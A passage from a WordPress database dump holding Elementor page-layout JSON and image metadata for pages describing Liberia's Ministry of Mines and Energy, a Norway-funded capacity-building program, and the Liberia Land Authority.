"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"573143f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"729b52c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"455a18c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2875b46\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:fda\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(18532,2718,'_elementor_controls_usage','a:7:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:5;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:7:\"divider\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:21:\"section_divider_style\";a:2:{s:5:\"color\";i:1;s:3:\"gap\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(18534,2718,'_thumbnail_id','2717'),(18535,2719,'_wp_attached_file','2019/11/featured_mme.jpg'),(18536,2719,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:24:\"2019/11/featured_mme.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"featured_mme-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"featured_mme-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"featured_mme-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"16\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:11:\"NIKON D7100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1534345484\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"26\";s:3:\"iso\";s:4:\"1000\";s:13:\"shutter_speed\";s:7:\"0.00125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(18537,1608,'_thumbnail_id','2719'),(18538,2720,'_elementor_edit_mode','builder'),(18539,2720,'_elementor_template_type','wp-post'),(18540,2720,'_elementor_version','2.7.5'),(18541,2720,'_wp_page_template','default'),(18542,2720,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"47e134c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Ministry functions in the area of policy formulation for the energy, hydrocarbon and water sectors of the Liberia. MME has direct oversight responsibility in the energy sector, and also similar role in developing the water resources of the country.<\\/p><p>The Institutional Capacity Building and Strengthening of the Water Resources and Energy sectors of Liberia is a contract that is signed and in effect between the Norwegian Water Resources and Energy Directorate (NVE), and the Liberian Ministry of Mines and Energy (MME) to implement an Agreement (Program) between the Governments of Liberia and Norway. This Program is a 5-year (2010 \\u2013 2015) program that was signed in 2010.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0006e2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"e3150d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e9d44d7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"14b21ae\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mme\\\",\\\"tag_id\\\":\\\"60\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mme\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"53f2292\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b05689\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1eff497\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f481ee\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.48)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9dc8e89\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"a075c63\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bdfbd70\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2255307\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mme\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(18543,2720,'_elementor_controls_usage','a:7:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:4;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:7:\"divider\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:21:\"section_divider_style\";a:2:{s:5:\"color\";i:1;s:3:\"gap\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(18545,2720,'_thumbnail_id','2719'),(18546,2721,'_elementor_edit_mode','builder'),(18547,2721,'_elementor_template_type','wp-page'),(18548,2721,'_elementor_version','2.7.5'),(18549,2721,'_wp_page_template','default'),(18550,2721,'_elementor_data','[{\"id\":\"19a2d02\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e499795\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2104bf2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"db72bf2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"50ccf42\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"d4ac18b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"106c13c\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"institution\",\"post_ids\":\"696,663,680,93,684,95,620,635,626,630,614,673,677,621,669,690,652,659\",\"title_trimmed_ending_text\":\"...\",\"show_excerpt\":\"\",\"excerpt_length\":\"\",\"show_terms_tax\":\"institutions_category\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"d6ea351\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"7f993f7\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"box_bg\":\"rgba(0,100,0,0.74)\",\"box_border_border\":\"solid\",\"box_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"box_border_color\":\"#61ce70\",\"box_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_color_hover\":\"#014421\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"title_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"title_margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"show_terms\":\"yes\",\"slides_to_scroll\":\"4\",\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"terms_link_typography_font_weight\":\"400\",\"terms_link_bg_color\":\"rgba(110,193,228,0.72)\",\"terms_link_color\":\"#000000\",\"terms_link_hover_bg_color\":\"#006400\",\"terms_link_hover_color\":\"#ffffff\",\"thumb_size\":\"full\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17e934c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"3d6400c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"baf14d9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(18553,2722,'_wp_attached_file','2019/11/Featured_lla.jpg'),(18554,2722,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:24:\"2019/11/Featured_lla.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Featured_lla-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Featured_lla-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Featured_lla-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1573813448\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(18555,1602,'_thumbnail_id','3188'),(18556,2723,'_elementor_edit_mode','builder'),(18557,2723,'_elementor_template_type','wp-post'),(18558,2723,'_elementor_version','2.7.5'),(18559,2723,'_wp_page_template','default'),(18560,2723,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a9160c2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Liberia Land Authority (LLA) is a product of the policy, legal and institutional reform of the land sector of Liberia led by the Erstwhile Land Commission. The LLA, established by an Act of the National Legislature on October 6, 2016, as an autonomous agency of the Government with operational independence, subsumes land functions that were performed by several agencies of the Government, including the key land administration agencies - Department of Lands, Survey and Cartography of the former Ministry of Lands, Mines and Energy (MLME), now the Ministry of Mines and Energy, the Deeds and Titles Registry of the Center for National Documents Records Agency (CNDRA), and functions of County Land Commissioners from the Ministry of Internal Affairs.<\\/p><p>The LLA\'s mandate of the Authority is to develop policies on a continuous basis, undertake actions and implement programs in support of land governance, including land administration and management in Liberia.\\u00a0<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"272fc6b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"c718620\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98dfd4f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"0986fea\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read 